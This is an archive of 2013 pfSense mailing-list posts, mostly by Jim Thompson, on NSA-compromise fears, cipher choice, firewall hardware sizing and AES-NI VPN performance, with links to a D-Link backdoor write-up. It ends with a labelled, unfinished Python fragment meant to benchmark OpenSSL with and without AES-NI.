On Oct 9, 2013, at 7:41 PM, Thinker Rix thinke...@rocketmail.com wrote:

> We all know that the governments currently force on a daily basis one company after the other to comply with their New World Order-Orwellian-global-surveillance fantasies and make them compromise their software or service. So I find it absolutely NECESSARY to clear out if pfSense has fallen (already) to them, or not. Network security is THE major reason for using pfSense. So it should be the most important question for all of us, isn't it? By my comprehension, everyone who says that this is a silly question or that it is some unimportant thought no one should further bother thinking about in detail, is either confused, or trying to conceal something.

You just want to have a discussion. Perhaps it makes you feel important, I don’t know. Your Alex Jonesian “New World Odor” rhetoric is tiring. Your NECESSARY discussion is not, because in the end analysis the discussion you want to have is orthogonal to the subject. You should instead only depend on you and your tools to ensure your security. Asking me (or Chris, or Jamie) to answer the question puts everyone in a position where nothing can be learned, so it is useless, rather than NECESSARY. Until you understand and accept this, your messages are mere platitudes.

Look, the integrity and bravery Ladar Levison has shown in his fight is impressive. He has definitely earned enough cred to restart his business outside the US and be very successful, but my hope is that he does not. We should celebrate Ladar for making the decision to put himself at risk in order to protect his users, but I think we should be careful not to forget that Ladar was forced to make that decision because the security of Lavabit was all a complete and total hand wave. There are already technologies such as PGP, S/MIME, smart cards, and the dozens of other ways we can have secure email without relying on a trusted third party such as Lavabit.

Lavabit could respond to a demand for plaintext, if Ladar were willing to do so (and in the end, he was, for a particular user); on the other hand, Google cannot give anyone access to the plaintexts of S/MIME encrypted messages that I send through their servers because of technical barriers. That is the point of doing your encryption locally, and that is why security and privacy are not, and never will be, a service.(*)

This wasn't untested water, either. The exact same thing happened to Hushmail in 2007 for the exact same reason, and should have been evidence enough that the model isn't viable, even for a non-US company. http://www.wired.com/threatlevel/2007/11/encrypted-e-mai/

So again, I think we should definitely support Ladar as a person, but we also need to be careful not to confuse that with supporting Lavabit (the company), which was a very real danger that should never be repeated again (again).

How you interpret this and subsequently apply it to ESF and/or pfSense is up to you.

Jim

(*) if you think about it for very long, it also shows that Snowden is not the Ür-hacker that the press wants to make him. His communications via Lavabit only gave the appearance of security, and he wasn’t smart enough to understand same.
Re: [pfSense] Can pfSense be considered trusted? What implementations of VPNs can now be trusted?
On Oct 10, 2013, at 4:34 PM, Yehuda Katz yeh...@ymkatz.net wrote:

> Since we keep coming back to FreeBSD as it pertains to security:
>
>> 3) FreeBSD is very mature, and very well reviewed. I've looked into FreeBSD to my personal satisfaction. OpenBSD may be abrasive as a community at times, but their work product is pretty impressive in terms of being clean and functional. I was very happy with how they handled that whole IPSec fiasco in 2011. I've been following pfSense for a while now, and I've used it off and on for years. I'm very satisfied by the quality and oversight of the coding. But by all means dig as long as your curiosity holds out. you can never be 100% sure of the security of any software, but sufficiently sure is absolutely worth looking into.
>
> FreeBSD is not the distribution in the BSD family that is best known for security. Indeed OpenBSD has a specific focus on security (which has been studied, as has the relationship between the BSDs), but FreeBSD focuses on being more inclusive of a variety of hardware at a cost of not being 100% open source. That is a tradeoff, but it does not mean that FreeBSD is not secure, it just means ... well I have not found a study about that yet.

Go ahead and believe the marketing/hype (“best known”) about OpenBSD if you like. The simple fact is, if security issues are found in any of the BSDs, the fixes for them quickly propagate between all of them.

In the end, OpenBSD is no more ‘secure’ than FreeBSD or NetBSD.

Jim
Re: [pfSense] NSA: Is pfSense infiltrated by big brother NSA or others?
On Oct 10, 2013, at 5:42 PM, Paul Mather p...@gromit.dlib.vt.edu wrote:

> I first started using mailing lists back in the mid/late 1980s,

You’re not the only one. :-)

I too was entertained by the n00b trying to tell grandpa how to use email.

Jim
Re: [pfSense] pfSense 2.1: which FreeBSD version?
On Oct 10, 2013, at 6:25 PM, Jim Pingle li...@pingle.org wrote:

> You shouldn't need the -archive bits since 8.3 is still a supported release.

Until next April, anyway.
Re: [pfSense] Can pfSense be considered trusted? What implementations of VPNs can now be trusted?
On Oct 10, 2013, at 4:49 PM, Giles Coochey gi...@coochey.net wrote:

> On 10/10/2013 15:04, Chris Bagnall wrote:
>> What made you change from AES to Blowfish, and is there any evidence to suggest that Blowfish is more 'secure' than AES?
>
> My understanding is that AES was championed by an agency which has received recent bad-press. ;-)

This is not an answer.

> Blowfish was a contender to actually become AES wasn't it?

Yes, but even Bruce Schneier, Blowfish's creator, is quoted in 2007 as saying "At this point, though, I'm amazed it's still being used. If people ask, I recommend Twofish instead."

https://www.computerworld.com.au/article/46254/bruce_almighty_schneier_preaches_security_linux_faithful/

> I agree that I might see better performance with AES as it is supported in hardware by many chipsets, and when selected all the contenders marked AES as second best (after their own submissions of course...). I'm not saying it is insecure, I'm just weary of the following:

non-technical reasons

> Is there any mechanism to insert ciphers into Pfsense that are not currently supported?

You have the source code.

I, for one, am uninterested in non standards-compliant (and thus interoperable) implementations.

jim
Re: [pfSense] naive suggestion: conform to US laws
On Oct 12, 2013, at 7:20 AM, Thinker Rix thinke...@rocketmail.com wrote:

> On 2013-10-11 22:33, Walter Parker wrote:
>> Yes, you have been informed correctly. There are more than 2. According to the World Atlas (http://www.worldatlas.com/nations.htm#.UlhOHVFDsnY) the number is somewhere between 189 and 196.
>
> No kidding! ;-)
>
>> But you did not answer the question asked: Name the country that you would move the project to and why you believe that country would do a better job?
>
> Why should *I* name it and why should I present ready solutions for an idea another community member brought up? Why should anybody be in a position to present ready solutions at this point? How about having a fruitful discussion and finding solutions together?

There is no reason to build a house on sand. There is no fruitful discussion to be had when the premise is patently false.

>> Then because the USA can't be trusted, who is going to replace the Americans on the project?
>
> You are mixing things up here. Just because the USA invented their tyrannous Uniting and Strengthening America by Providing Appropriate Tools Required to Intercept and Obstruct Terrorism Act, for which they perversely coined the euphemistic term Patriot Act and therefore can not be trusted anymore for hosting anything there, why should the Americans be replaced?!?!?
>
>> The name and logo are owned by an American company.
>
> I guess, that is true, i.e. that ESF registered pfSense and its logo as a brand name.

You seem upset at this. Why?

Instead of some kooky conspiracy theory that ESF could be tortured or pressured to weaken pfSense, is this the *real* issue you have?

>> I doubt they want to give them up to a foreign company owned by non-Americans
>
> Nobody suggested that. Try thinking a bit more outside the box! For instance: A non-profit foundation could be founded in a country outside the USA, and the brand, hosting of the project, etc. be transferred to that company. A board would be elected for this foundation who just do a few basic things annually to keep the foundation running. ESF on the other side would be released of a great threat! They could continue offering their pfSense services to their customers as usual, but from now on nobody could come and force them to do things to pfSense since they have nothing to do with it”.

You seem upset that ESF controls the project. Why?

>> just to make it harder for the American government to pressure the project.
>
> Incorporating pfSense and bringing it out of the reach of US-domestic jurisdiction would not make it harder but impossible to pressure the project.

You have provided no explanation (other than “rubber hoses”) for what form that “pressure” would take.

>> If the rest of world wants to fork the project because of concerns about the US government, fine, but I don't think you will get buy in from ESF [the American company that owns the rights to the name pfSense].
>
> Why to fork the code base?! No one suggested that - and no one suggested to do things without - or even against - the key people of the ESF. Right the opposite. It would even protect the ESF!
>
>> Once again, name some names. Who do you consider more trustworthy?
>
> I am not Jesus to hand solutions to the community on a silver platter

though point in fact, Jesus didn’t hand anyone a solution.

> (but surely would be available for a *constructive* and *well-disposed*, *amicable* discussion to find solutions together!). I know of quite a lot of countries that seem interesting for a closer analysis for this cause and surely would propose one or another in such a constructive discussion. Generally, what Adrian proposed only makes sense if the community - including ESF - understands the threat and decides to act proactively to fight this threat.

“The community” doesn’t own the copyright on the code, nor the trademarks to the names used. Those belong to ESF.

Further, you’ve hypothesized about a ‘threat’ without providing any factual basis for same. The term for this form of argument is “conspiracy theory”.

Since pfSense is open source (specifically, the BSD license), “the community” (or rather “a community”) could take the decision to fork the code and create their own solution. It’s been attempted a couple times, but none of these have flourished. While I don’t encourage forks (it’s typically not good for either project), occasionally they work out (at least for a while), I don’t go out of my way to inhibit those who wish to fork. However, in any case, such a community would be prohibited from naming the result “pfSense”.

> But since 33% of the ESF - namely Jim Thompson

You greatly inflate my ownership interest here.

> - prefers bullying, insulting, frightening and muzzling anybody who brings up the threat that we are facing, trying to strike dead any thought as soon as it comes up (strange, isn't it?),

Not as strange as someone randomly showing up one day, hiding
Re: [pfSense] Upgrade Guide: Needs update for Auto Update
On Oct 12, 2013, at 3:33 PM, Thinker Rix thinke...@rocketmail.com wrote:

> Hello all,
>
> I just performed an upgrade to 2.1 via the Auto update feature in the web UI, which worked flawlessly. When studying the Upgrade Guide (https://doc.pfsense.org/index.php/Upgrade_Guide) prior to the upgrade I could not find any information about it. Is there a way I can update the guide myself? Otherwise maybe someone with writing rights to the CMS wants to update the manual.
>
> Cheers
> Thinker Rix
>
> P.S. Maybe an update to this page would be convenient, too: https://doc.pfsense.org/index.php/Can_I_upgrade_my_pfSense_through_the_web_interface%3F

My immediate suggestion is to edit a copy of the page (it’s a wiki, so “view source”), perform a ‘diff’ and send the result to coreteam-at-pfsense-dot-org.

Jim
Re: [pfSense] naive suggestion: conform to US laws
On Oct 12, 2013, at 1:35 PM, Chris L c...@viptalk.net wrote:

> On 2013-10-12 01:40, Jim Thompson wrote:
>> I'm not willing to endure this uninformed Alex Jonesian crapfest.
>
> Nice position to take, except Alex Jones was right.

Sigh. As much as this doesn’t belong on the pfsense list…

I actually know Alex, or did, 13 years ago. I got friendly enough with him back in the mid-late 90s that we had each other’s cell phone numbers. Back then Jamie and I were involved with Fringeware.

http://en.wikipedia.org/wiki/FringeWare_Review
http://www.austinchronicle.com/issues/vol16/issue26/screens.fringeware.html

Fringeware became an advertiser on Alex Jones' radio show (on KLBJ, before he got booted). On the front-end, I was a respected advertiser. Meanwhile, others associated with Fringeware were culture-jamming him on the back-end. The result: #discordia

Oh, the memories this brings back. (As you’ll see, the FBI showed up to demand something, didn’t have a warrant, and was shown the sidewalk.)

http://www.wingtv.net/thorn2006/jarhead.html
http://www.austinchronicle.com/news/2000-07-14/77932/

Clayton, btw is a dear friend. Easily one of the most brilliant people I’ve ever known. I hope he speaks at my funeral.

Other fun was had at Fringeware. We supported the Yes Men (http://en.wikipedia.org/wiki/The_Yes_Men). We actually hosted their website, as well as that of RTmark for a period in the late 90s on the same machine used for smallworks.com (which was originally the corporation behind the firewall named “Netgate”), fringeware.com, etc.

One of their pranks was that they set up a website named www.gwbush.com (http://en.wikipedia.org/wiki/The_Yes_Men#George_W._Bush http://theyesmen.org/hijinks/gwbush http://www.rtmark.com/bush.html), which resulted in Bush’s famous “There ought to be limits to freedom” quote.

http://www.rtmark.com/bushpr2.html

The great untold story on this is that all these websites were hosted in a shitty office building on Shoal Creek Blvd, one floor up from the then offices of “Karl Rove Associates” even as they fought to shut down gwbush.com. The #irony was delicious, and they never succeeded. :-)

Anyway, you might want to study up on STRATFOR, or Mary Maroney, who was the editor in chief of Infowars magazine until earlier this year. Maroney formerly worked for Stratfor and Parker Media here in Austin. If you don’t know who they are, then I suggest more research on your part.

Have fun, but be careful when you enter the rabbit hole.

Snowden and Manning are both late-comers to the party:

http://www.newyorker.com/reporting/2011/05/23/110523fa_fact_mayer?currentPage=all
http://www.technologyreview.com/news/519661/nsas-own-hardware-backdoors-may-still-be-a-problem-from-hell/
http://cryptome.org/nsa-ssl-email.htm
http://news.cnet.com/8301-31921_3-20017671-281.html
http://www.wired.com/images_blogs/threatlevel/2013/09/15-shumow.pdf (see also: http://www.wired.com/threatlevel/?p=85661)
http://arstechnica.com/security/2013/01/secret-backdoors-found-in-firewall-vpn-gear-from-barracuda-networks/
http://dl.packetstormsecurity.net/papers/general/my_research1.pdf
http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.154.825 / http://www.cs.ucf.edu/~czou/research/Chipset%20Backdoor-AsiaCCS09.pdf (now consider all the cheerleading for Intel Ethernet chips on the various pfSense lists…)

Jim
[pfSense] not all backdoors are NSA backdoors
It occurs to me that being more ‘conversational’ with the community might be a good thing. Describing what is happening with pfSense, and why, and engaging the pfsense community in the process could be a good thing. My first attempt is included herein.

But first, on the tail of the recent thread that erupted here, consider this backdoor that someone (?) recently (?) discovered (?) in the firmware for certain D-link routers: http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/

If you read the article, the user agent string that bypasses authentication (according to the post) can be read backwards as “Edit by 04882 Joel Backdoor”.

One possible Joel is Joel Liu, Senior Director-Chief Technology Office Alpha Networks: http://www.joesdata.com/executive/Joel_Liu_421313008.html

Alpha Networks being a spin-off of D-Link. http://www.alphanetworks.com/_english/06_about/01_detail.php?appid=143pid=12

They have a GPL compliance office: http://www.alphanetworks.com/_english/10_gpl/gpl.php, but you can bet they won’t ship you that source code.

[Normally, if one is going to hide secret strings inside the binary, one also obfuscates them. An example: http://www.codeproject.com/Articles/502283/Strings-Obfuscation-System]

...

In some respects, the recent thread was about fear of asymmetric information, that those inside ESF have information and access that the community does not.

In contract theory and economics, information asymmetry deals with the study of decisions in transactions where one party has more or better information than the other. In contrast to neo-classical economics which assumes perfect information, this is about What We Don't Know. This creates an imbalance of power in transactions which can sometimes cause the transactions to go awry, in the worst case a kind of market failure.

Specific to the subject, the information asymmetry here is the community’s supposed inability to observe and/or verify ESF's actions.

To the best of our ability so far, pfSense is both observable and verifiable. The source code is on github (https://github.com/pfsense/), and the build process is quasi-documented. Getting something like the ‘backdoor by Joel’ above into the codebase without detection would be difficult if not impossible. (There are more subversive means, which I touched on mid-thread, but they still fail in the presence of a public development process.)

Frankly, (between you and I), the pfSense build process could be better documented. Truth be told: the build system for pfSense is archaic. Nobody associated with it (at this point) likes it. Simultaneously, everyone is afraid to replace it. “There be dragons…”

An action-item post 2.2 (and its move to FreeBSD 10) is to clean-up the build system, possibly making it more like that which builds FreeBSD, rather than the mess of shell (and PHP) scripts that exists now. Having a cleaner build system could lead to better verification of the resultant bits.

Another issue is the proliferation of pfSense mirrors. How do we (all) trust the bits on these mirrors, given that they’re run by parties entirely independent and remotely located from ESF? One possible solution: signed packages, and there was a bit of infrastructure put in-place just prior to the 2.1 release. We’ve yet to accomplish the rest of this, but.. it’s coming.

As always, if you have ideas(*), bring them forward.

Jim

(*) that don’t involve re-incorporating as a non-US, non-profit company…
Re: [pfSense] naive suggestion: conform to US laws
On Oct 15, 2013, at 8:53 AM, Alex DiMarco a...@cs.toronto.edu wrote:

> On Tue, Oct 15, 2013 at 8:20 AM, Robert Skinner rob...@robertskinner.com wrote:
>> You would have hated the 90s then.
>
> Interesting time that was, no particular hate though for that period.. Now the 80's on the other hand :*)

It was only the music that sucked in the 80s… Oh, and the clothing / hair styles, and the politics, and … :-)

> Though annoying at times, these displays on mailing lists have also sparked some great technology projects too. Those around in the early BSD days recall such episodes. Not that I am promoting or encouraging such behavior. There is no doubt great technology has emerged from conflict; verbal and otherwise. I think I may be an optimist with a belief that if we choose to interpret intentions in a positive way even when they are communicated otherwise, we can potentially do even greater things... maybe I am choosing to be naive... but then, that is the title of this thread
>
>> You will always have “that guy”, at a bar now and then, but as long as it’s not a bar full of that personality.
>
> I think unfortunately all of us have had the privilege of being that guy at the bar - I know I have a few times even without the Guinness or Scotch flowing 8*]

So what excuse do I have, given that I was stone sober? (In France at the time, but still… sober.)

Jim
Re: [pfSense] Hardware requirements for gigabit wirespead
On Oct 24, 2013, at 12:02 PM, Chris Bagnall pfse...@lists.minotaur.cc wrote:

> On 24/10/13 5:30 pm, Thinker Rix wrote:
>> I want to have:
>> - full Gigabit wire speed between the DMZ and the LAN zone (i.e. 2x Gigabit at max)
>
> Would have thought you'd be fine here.
>
>> - full 450Mbps between the WLAN and pfsense
>
> Even with 450Mbps *radios* I'd be amazed if you get more than ~80Mbps out of your WLAN. Not a pfSense limitation, just a reality of WLAN claimed radio speeds. I generally expect to see ~55-65Mbps out of 2x2 radios, so ~80Mbps out of 3x3 is probably realistic.

Depends on your RF environment and channel orthogonality.

> Unless you're in a really isolated area, using an 80MHz channel (which is what you'd need for 450Mbps radio speed) will slaughter spectrum availability for your neighbours. Short of really needing that speed, try to stick with 20MHz channels where possible. And if you're in a very congested WiFi area, you may even get better speeds out of 20MHz (much easier to find one free 20MHz channel than a free 80MHz channel).
>
>> - maximal VPN speed without speed break due to hardware limitations, i.e. as near to wire speed as possible
>
> Depends on your choice of crypto algorithm and whether you can do it in hardware.

I’d recommend a CPU that supports AES-NI, even if the FreeBSD support for same turns out to be lagging.

‘wire speed’ would need to be defined. I do know of boxes that will run at 25Gbps. As the guy at the hot rod shop told me 30 years ago, “Speed costs money son. How fast do you want to go?”

>> 1. Would the Core2Duo CPU be sufficient for my requirements or should I choose the 2,4 GHz Quad-core, the 2,89 GHz-Quad-core or maybe an even more powerful CPU or totally different setup?
>
> When I was deploying a Quagga-based BGP setup in a datacentre a couple of years ago, the general consensus was that cores are more important than raw clock speed - so 4x2.4Ghz is better than 2x3.4Ghz - at least when using multiple interfaces.

That’s not what I’d have guessed. If your application load is single-threaded (or a single process), then clock speed will win every time. If your application (load) can be broken down into pieces that execute in parallel, then cores will be a win. You’ve not specified the problem well enough to discuss.

An AS with internal BGP (iBGP) must have all of its iBGP peers connect to each other in a full mesh (where everyone speaks to everyone directly). This full-mesh configuration requires that each router maintain a session to every other router. In large networks, this number of sessions may degrade performance of routers, due to either a lack of memory, or too much CPU process requirements.

There will also need be some serious consideration on the reliability of the network, and its constituent part(s). If those wireless links are for exterior paths, and not simply 802.11 LANs, then you’re in for a huge amount of trouble, as wireless isn’t reliable. At all.

> This was, however, with Linux hosts. One of the nice things about those Intel server cards is the ability to lock NIC affinity to CPUs/cores, so you can effectively task a core to one or more NIC ports.

But that would require completely re-architecting the application(s).

> Hopefully others will chime in as to whether the same is true with FreeBSD - I seem to recall there were SMP/multi-core efficiency issues with earlier FreeBSD versions - hopefully those have been ironed out by now.
>
>> 2. Is there any other bottleneck that will prevent my performance requirements?
>
> Bonding is not a guarantee of doubled speeds. In my experience, bonding 2 gigabit NICs will generally yield around 1.2-1.4Gbps raw throughput. You are very unlikely to get 2Gbps. Bonding is more about redundancy (failover) than throughput at this level. If you really need 1Gbps, you're going to have to consider 10GE kit.
>
>> 3. When bonding the NICs, I was planning to use a port on each of the PCIe cards so to have a little bit of redundancy should an expansion card fail. Will there be significant performance losses due to this spread over 2 expansion cards, so that it would be much better to bond two NICs that live on the same expansion card and forget about the additional redundancy?
>
> No, I agree that bonding 2 ports on separate cards is the best option. You're already thinking redundancy with the multiple NIC considerations, but in my experience, NICs don't really fail that often - at least not compared to fans, power supplies and other PC components. Consider whether a 2x pfSense cluster in CARP might be more to your needs if redundancy/failover is a critical requirement.
>
> Looking at your hardware again, you've specced 12 NICs, but from what I can see from your config, you only need 8 (2 VDSL ports, 2 bonded ports for LAN, 2 bonded ports for DMZ, (assuming) 2 bonded ports for WLAN).
>
>> 4x on-board Realtek 8111C Gigabit NICs
>
> Personally
Re: [pfSense] Hardware requirements for gigabit wirespead
The topic has wandered away from pfSense.

-- Jim

On Oct 24, 2013, at 18:48, Chris Bagnall pfse...@lists.minotaur.cc wrote:

> On 24/10/13 7:31 pm, Adam Thompson wrote:
>> If I upgraded to a better-quality unit, or switched to licensed spectrum, I could probably eliminate the variability and increase speed simultaneously.
>
> Indeed, we have Ubiquiti kit running point to point links in the 5Ghz unlicensed spectrum (band C) over around 18km which deliver ~65Mbps throughput. I think our distance record is just shy of 68km.
>
>> Within the Ubiquity line, the AirFiber apparently would get me to ~99.99% reliability at ~600Mbps, or ~99.9% reliability at ~1Gbps. Still using unlicensed spectrum, using the built-in directional antennas.
>
> Do check the 24Ghz spectrum rules carefully in your jurisdiction - certainly here in the UK the 24Ghz unlicensed spectrum is limited, and only allows fairly low power without a licence.
>
>> I do not have personal experience with Alvarion, but I can unreservedly recommend Dragonwave.
>
> I'd add Motorola Orthogon kit to that list, based on some offshore experience with it a few years ago.
>
> Kind regards,
>
> Chris
> --
> This email is made from 100% recycled electrons
Re: [pfSense] Disk Read failure (but it seems to work anyway)
https://doc.pfsense.org/index.php/DMA_and_LBA_Errors

On Mon, Oct 28, 2013 at 12:18 PM, Bob Gustafson bob...@rcn.com wrote:

> I installed 2.1 on a SanDisk 4GB Ultra (200x) for use on an Alix board.
>
> I configured the ethernet ports using the serial connection and then left the connection and minicom running while I did more configuration using the ethernet webConfigurator.
>
> Every time I would make a change to the configuration, I get:
>
> ad0: FAILURE - READ status=51<READY,DSC,ERROR> error=10<NID_NOT_FOUND> LBA=78139
> ad0: FAILURE - READ status=51<READY,DSC,ERROR> error=10<NID_NOT_FOUND> LBA=78139
> ad0: FAILURE - READ status=51<READY,DSC,ERROR> error=10<NID_NOT_FOUND> LBA=78139
> ad0: FAILURE - READ status=51<READY,DSC,ERROR> error=10<NID_NOT_FOUND> LBA=78139
>
> from the serial port.
>
> Even though it says FAILURE, the configuration was retained. (Perhaps a power cycle will wipe it out. Will power cycle in a minute and report here)
>
> Can I do something to fix the problem, or eliminate the messages?
>
> Perhaps the SanDisk Ultra is too fast? I picked it more for reliability than speed. Perhaps it was not a good choice.
>
> -
>
> On power cycle, there were some read errors:
>
> ...uhub0: 4 ports with 4 removable, self powered
> ad0: FAILURE - READ status=51<READY,DSC,ERROR> error=10<NID_NOT_FOUND> LBA=78139
> ad0: FAILURE - READ status=51<READY,DSC,ERROR> error=10<NID_NOT_FOUND> LBA=78139
> Root mount waiting for: usbus1
> uhub1: 4 ports with 4 removable, self powered
> Trying to mount root from ufs:/dev/ufs/pfsense0
> Configuring crash dumps...
> Mounting filesystems...
> Setting up memory disks... done.
> Disabling APM onad0: FAILURE - SETFEATURES 0x85 status=51<READY,DSC,ERROR> erro
> /dev/ad0
>
> ... but it seems all of my configuration information was retained.
>
> Bob G
Re: [pfSense] AES-NI support of the CPU: Does it make sense for VPN with pfSense?
On Nov 6, 2013, at 7:22, Vick Khera vi...@khera.org wrote:
> pfSense lists the AES-NI as a supported option for crypto acceleration. pfSense will use it for OpenVPN and IPsec if you tell it to. There's a config setting for it.

I'm not aware of any performance testing for AES-NI on pfSense. There are reports that FreeBSD doesn't support AES-NI very well.

Jim
Re: [pfSense] AES-NI support of the CPU: Does it make sense for VPN with pfSense?
On Nov 6, 2013, at 8:06 AM, Thinker Rix thinke...@rocketmail.com wrote:
> On 2013-11-06 15:29, Jim Thompson wrote:
>> On Nov 6, 2013, at 7:22, Vick Khera vi...@khera.org wrote:
>>> pfSense lists the AES-NI as a supported option for crypto acceleration. pfSense will use it for OpenVPN and IPsec if you tell it to. There's a config setting for it.
>>
>> I'm not aware of any performance testing for AES-NI on pfSense. There are reports that FreeBSD doesn't support AES-NI very well.
>
> Thank you for this information, Jim. So I figure that buying the Xeon just for its AES functions would (currently) be a waste of money.

I can’t answer this, because I’ve not tested it.

I know that the Linux kernel and OpenBSD both take full advantage of AES-NI instructions.
http://ibatanov.blogspot.com/2012/04/ipsec-performance-benchmarking-is-end.html
http://comments.gmane.org/gmane.os.openbsd.misc/199639

I know there is an implementation of AES-NI for cryptdev, but I HAVE NOT TESTED IT (nor has anyone else on the pfSense team, AFAIK). There seems to be an issue:
http://forum.pfsense.org/index.php/topic,54008.30.html
http://lists.freebsd.org/pipermail/freebsd-hackers/2012-May/038762.html

In the meantime, it might be possible to use OpenVPN with a patched openssl library to achieve the results you desire (but now you’re off into DIY land.)
https://community.openvpn.net/openvpn/wiki/Gigabit_Networks_Linux

That all said, we will find and fix the issue at some point. (I’m actually in San Jose for the FreeBSD Vendor Summit, and plan to bring it up as a potential issue.)

Jim
Re: [pfSense] AES-NI support of the CPU: Does it make sense for VPN with pfSense?
The issue may not be that easy to fix. Current theory is that it's a structural issue in cryptdev.

-- Jim

On Nov 6, 2013, at 20:59, Chris Buechler c...@pfsense.org wrote:
> I have done some brief testing of AES-NI a few months back, though I can't seem to find the results at the moment and that test environment isn't online currently. It doesn't give the performance benefit that it should at this time. So the immediate benefit is minimal (except for the fact the Xeon proc would be faster than the Pentium), but it will be properly supported in the future, hopefully in 2.2 with its FreeBSD 10 base, but we haven't done any testing there yet.
>
> On Tue, Nov 5, 2013 at 11:53 PM, Thinker Rix thinke...@rocketmail.com wrote:
>> Hello all,
>>
>> as I am planning to buy new hardware for pfSense, I was wondering if it is worth it to buy a CPU that supports AES new instructions, i.e. hardware support for AES encryption.
>>
>> Would pfSense use these CPU instructions to hardware-encrypt/decrypt all VPN traffic (OpenVPN)? Would pfSense benefit from this in any other way, too?
>>
>> The motherboards that I want to buy unfortunately support AES-NI only with Xeons that currently start from approx 170 €. If I would take a CPU without AES-NI, I could go with a dual-Pentium for 40€.
>>
>> What impact would you expect from AES-NI, in regards to the fact that I will be having traffic from VPN secured WLAN with approx 300-450 Mbps and VPN to/from the internet, 1-2 users at a time max.
>>
>> Do you think the AES-NI would be worth the price premium of the Xeon for my case, e.g. because it would reduce VPN latency, etc., or is it just a pure waste of money in my case?
>>
>> Best regards
>> Thinker Rix
Re: [pfSense] AES-NI support of the CPU: Does it make sense for VPN with pfSense?
The Xeon CPUs are almost idle. The old Intel 32-bit Pentium 4 2.4GHz dual core server, however, is the other end of that IPSEC tunnel. It's unlikely to be as idle as the Xeon.

-- Jim

On Nov 6, 2013, at 8:04, Thinker Rix thinke...@rocketmail.com wrote:
> On 2013-11-06 15:22, Vick Khera wrote:
>> On Wed, Nov 6, 2013 at 12:53 AM, Thinker Rix thinke...@rocketmail.com wrote:
>>> Would pfSense use these CPU instructions to hardware-encrypt/decrypt all VPN traffic (OpenVPN)? Would pfSense benefit from this in any other way, too?
>>
>> pfSense lists the AES-NI as a supported option for crypto acceleration. pfSense will use it for OpenVPN and IPsec if you tell it to. There's a config setting for it.
>>
>> As to your question of is it worth the cost, that depends on how much VPN traffic you have. The Xeon will handle a damn lot of traffic all on its own. If you are pushing more than 40Mbps on the VPN, then perhaps consider the extra cost. If it is low, like under 5 or 10Mbps, then I'd probably suggest that it is not worth the cost.
>>
>> As a reference, between my data center and my primary office, I have an IPsec tunnel. The office runs on an old Intel 32-bit Pentium 4 2.4GHz dual core server. The data center runs on Intel Xeon E31220L @ 2.20GHz quad-core. Neither one has any built-in cryptodev supported devices. The IPsec tunnel maxes out at about 20Mbps during large file backups. I don't think it would go any faster with hardware acceleration, and the load on these boxes hovers around 0 still. The data center firewall is also busy pushing over 100Mbps of regular traffic to hundreds of clients as well.
>
> Hi Vick,
>
> Thank you for your reference, it is very valuable for me! I guess I will go with a Pentium (Ivy Bridge) 2x 3.0 GHz CPU.
>
> What do you think is the reason for your VPN traffic maxing out at 20Mbps (I assume that your connection is not the traffic bottleneck, right?), although your CPUs are almost idle?
>
> Best regards
> Thinker Rix
Re: [pfSense] AES-NI support of the CPU: Does it make sense for VPN with pfSense?
I was at the FreeBSD Vendor Summit last week, and raised the AES-NI issue as important to be solved in the next six months. The issue and fix are understood, it just needs someone to implement it (and then, presumably, backport it to 8.3, so we can release an update to 2.1 (2.1.1 or similar)).

Jim

On Fri, Nov 8, 2013 at 12:33 PM, Thinker Rix thinke...@rocketmail.com wrote:
> Hi all,
>
> On 2013-11-06 07:53, Thinker Rix wrote:
>> as I am planning to buy new hardware for pfSense, I was wondering if it is worth it to buy a CPU that supports AES new instructions, i.e. hardware support for AES encryption.
>
> As I learned in this thread (big thanks to everybody participating), AES-NI is adding no value to pfSense currently, at all. So currently the only solution is to throw GHz at the problem.
>
> Searching myself through the web to learn what CPU speed I would need to achieve my desired 450 MBit/s VPN (or come at least somewhat close to this theoretical max), I found this:
> http://forums.freenas.org/threads/encryption-performance-benchmarks.12157/
>
> I copied those measurements found there into a spreadsheet so to analyze those values. If anybody is interested in this spreadsheet (.ods), I can send it to him via private mail (I guess binaries are not allowed in the mailing list). Just drop me a message.
>
> Regards
> Thinker Rix
Re: [pfSense] AES-NI support of the CPU: Does it make sense for VPN with pfSense?
I think the people with the relevant skill are willing to fix it, when they're shown that what they did (cryptdev support) doesn't provide any benefit.

read: it's being taken care of.

On Mon, Nov 11, 2013 at 1:20 PM, Vick Khera vi...@khera.org wrote:
> Did you get the sense people with the relevant skill were open to a bounty for implementing the necessary fixes?
>
> On Mon, Nov 11, 2013 at 1:36 PM, Jim Thompson j...@netgate.com wrote:
>> I was at the FreeBSD Vendor Summit last week, and raised the AES-NI issue as important to be solved in the next six months. The issue and fix are understood, it just needs someone to implement it (and then, presumably, backport it to 8.3, so we can release an update to 2.1 (2.1.1 or similar)).
>>
>> Jim
>>
>> On Fri, Nov 8, 2013 at 12:33 PM, Thinker Rix thinke...@rocketmail.com wrote:
>>> Hi all,
>>>
>>> On 2013-11-06 07:53, Thinker Rix wrote:
>>>> as I am planning to buy new hardware for pfSense, I was wondering if it is worth it to buy a CPU that supports AES new instructions, i.e. hardware support for AES encryption.
>>>
>>> As I learned in this thread (big thanks to everybody participating), AES-NI is adding no value to pfSense currently, at all. So currently the only solution is to throw GHz at the problem.
>>>
>>> Searching myself through the web to learn what CPU speed I would need to achieve my desired 450 MBit/s VPN (or come at least somewhat close to this theoretical max), I found this:
>>> http://forums.freenas.org/threads/encryption-performance-benchmarks.12157/
>>>
>>> I copied those measurements found there into a spreadsheet so to analyze those values. If anybody is interested in this spreadsheet (.ods), I can send it to him via private mail (I guess binaries are not allowed in the mailing list). Just drop me a message.
>>>
>>> Regards
>>> Thinker Rix
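One way to answer the thread's question for a specific box, as an added example that is not from the list: run OpenSSL's own benchmark with and without AES-NI masked out and compare the two. This measures only OpenSSL's userland AES path (the one OpenVPN uses), not the FreeBSD cryptodev path that IPsec goes through; the `-seconds` flag assumes OpenSSL 1.1.0 or newer, and the sample table rows below are constructed, not real measurements.

```python
"""Added example (not from the thread): check whether OpenSSL's AES-NI path
delivers a speedup on this machine by running `openssl speed -evp` twice,
once normally and once with AES-NI masked out via OPENSSL_ia32cap, then
comparing the largest-block throughput of the two summary rows."""
import os
import re
import shutil
import subprocess

# `openssl speed` ends with a table whose rows look like
#   aes-128-cbc   612345.67k   812345.67k  ...   (1000s of bytes/s per block size)
# OpenSSL 3 prints the cipher name in upper case, so matching is case-insensitive.
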